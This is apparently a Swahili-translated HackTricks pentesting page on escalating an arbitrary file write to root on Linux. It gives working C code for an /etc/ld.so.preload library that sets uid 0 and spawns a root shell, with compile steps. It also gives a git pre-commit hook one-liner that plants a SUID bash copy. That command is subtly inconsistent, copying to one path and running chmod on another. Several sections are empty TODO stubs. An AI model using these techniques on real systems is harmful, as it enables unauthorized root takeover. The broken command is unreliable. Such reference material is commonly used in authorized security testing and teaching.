Arbitrary File Write to Root

Jifunze na zoezi la AWS Hacking:Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE) Jifunze na zoezi la GCP Hacking: Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)

unga mkono HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

/etc/ld.so.preload

Faili hii inajitendea kama LD_PRELOAD mazingira ya env lakini pia inafanya kazi kwa binari za SUID. Ikiwa unaweza kuunda au kuhariri, unaweza tu kuongeza njia ya maktaba itakayopakiwa kila wakati binari inapotekelezwa.

Kwa mfano: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Kanzidata ya Git

Kanzidata ya Git ni maandishi ambayo hutekelezwa katika matukio mbalimbali katika kanzidata ya git kama vile wakati wa kufanya commit, kufanya merge... Kwa hivyo, ikiwa maandishi au mtumiaji mwenye mamlaka anafanya vitendo hivi mara kwa mara na ni rahisi kuandika katika folda ya .git, hii inaweza kutumika kwa privesc.

Kwa mfano, Inawezekana kuandika maandishi katika kanzidata ya git katika .git/hooks ili iweze kutekelezwa daima wakati commit mpya inapotengenezwa:

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

Faili za Cron & Wakati

TODO

Faili za Huduma & Soketi

TODO

binfmt_misc

Faili iliyoko katika /proc/sys/fs/binfmt_misc inaonyesha ni binary gani inapaswa kutekeleza aina gani ya faili. TODO: angalia mahitaji ya kutumia hii kutekeleza rev shell wakati aina ya kawaida ya faili inafunguliwa.

PreviousLinux Privilege Escalation NextCisco - vmanage

Last updated 4 months ago